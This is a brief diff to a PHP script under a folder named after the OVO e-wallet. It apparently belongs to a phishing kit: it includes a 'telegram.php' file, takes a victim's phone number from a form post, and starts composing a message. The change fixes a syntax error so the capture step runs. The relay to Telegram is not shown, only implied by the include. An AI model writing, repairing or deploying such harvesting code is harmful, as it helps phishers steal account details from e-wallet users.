--- a/ovo/sendno.php/index.html
+++ b/ovo/sendno.php/index.html
@@ -3,7 +3,7 @@
 session_start();
 include "telegram.php";
 
-nohp = $_POST['nohp'];
+$nohp = $_POST['nohp'];
 
 $message =  "
 ──────────────────────
